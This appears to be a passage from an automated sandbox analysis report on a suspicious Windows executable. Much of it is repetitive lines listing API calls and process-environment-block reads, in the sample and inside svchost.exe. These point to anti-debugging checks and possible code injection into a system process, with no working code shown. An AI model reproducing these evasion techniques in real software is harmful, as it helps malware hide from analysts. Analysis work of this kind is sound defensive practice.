            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_03ECD138 mov eax, dword ptr fs:[00000030h]0_2_03ECD138
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_03ECD0D8 mov eax, dword ptr fs:[00000030h]0_2_03ECD0D8
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_03ECBA88 mov eax, dword ptr fs:[00000030h]0_2_03ECBA88
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C310 mov ecx, dword ptr fs:[00000030h]1_2_0322C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250310 mov ecx, dword ptr fs:[00000030h]1_2_03250310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D437C mov eax, dword ptr fs:[00000030h]1_2_032D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov ecx, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA352 mov eax, dword ptr fs:[00000030h]1_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D8350 mov ecx, dword ptr fs:[00000030h]1_2_032D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032663FF mov eax, dword ptr fs:[00000030h]1_2_032663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC3CD mov eax, dword ptr fs:[00000030h]1_2_032EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B63C0 mov eax, dword ptr fs:[00000030h]1_2_032B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov ecx, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322823B mov eax, dword ptr fs:[00000030h]1_2_0322823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322826B mov eax, dword ptr fs:[00000030h]1_2_0322826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov eax, dword ptr fs:[00000030h]1_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov ecx, dword ptr fs:[00000030h]1_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A250 mov eax, dword ptr fs:[00000030h]1_2_0322A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236259 mov eax, dword ptr fs:[00000030h]1_2_03236259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov ecx, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]1_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]1_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260124 mov eax, dword ptr fs:[00000030h]1_2_03260124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov ecx, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F0115 mov eax, dword ptr fs:[00000030h]1_2_032F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304164 mov eax, dword ptr fs:[00000030h]1_2_03304164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304164 mov eax, dword ptr fs:[00000030h]1_2_03304164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov ecx, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C156 mov eax, dword ptr fs:[00000030h]1_2_0322C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C8158 mov eax, dword ptr fs:[00000030h]1_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]1_2_03236154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]1_2_03236154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03270185 mov eax, dword ptr fs:[00000030h]1_2_03270185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]1_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]1_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]1_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]1_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033061E5 mov eax, dword ptr fs:[00000030h]1_2_033061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032601F8 mov eax, dword ptr fs:[00000030h]1_2_032601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]1_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]1_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A020 mov eax, dword ptr fs:[00000030h]1_2_0322A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C020 mov eax, dword ptr fs:[00000030h]1_2_0322C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6030 mov eax, dword ptr fs:[00000030h]1_2_032C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4000 mov ecx, dword ptr fs:[00000030h]1_2_032B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325C073 mov eax, dword ptr fs:[00000030h]1_2_0325C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232050 mov eax, dword ptr fs:[00000030h]1_2_03232050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6050 mov eax, dword ptr fs:[00000030h]1_2_032B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C80A8 mov eax, dword ptr fs:[00000030h]1_2_032C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F60B8 mov eax, dword ptr fs:[00000030h]1_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F60B8 mov ecx, dword ptr fs:[00000030h]1_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323208A mov eax, dword ptr fs:[00000030h]1_2_0323208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0322A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032380E9 mov eax, dword ptr fs:[00000030h]1_2_032380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B60E0 mov eax, dword ptr fs:[00000030h]1_2_032B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C0F0 mov eax, dword ptr fs:[00000030h]1_2_0322C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032720F0 mov ecx, dword ptr fs:[00000030h]1_2_032720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B20DE mov eax, dword ptr fs:[00000030h]1_2_032B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]1_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov ecx, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A830 mov eax, dword ptr fs:[00000030h]1_2_0326A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC810 mov eax, dword ptr fs:[00000030h]1_2_032BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6870 mov eax, dword ptr fs:[00000030h]1_2_032C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6870 mov eax, dword ptr fs:[00000030h]1_2_032C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03242840 mov ecx, dword ptr fs:[00000030h]1_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260854 mov eax, dword ptr fs:[00000030h]1_2_03260854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234859 mov eax, dword ptr fs:[00000030h]1_2_03234859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234859 mov eax, dword ptr fs:[00000030h]1_2_03234859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230887 mov eax, dword ptr fs:[00000030h]1_2_03230887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC89D mov eax, dword ptr fs:[00000030h]1_2_032BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA8E4 mov eax, dword ptr fs:[00000030h]1_2_032FA8E4
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7
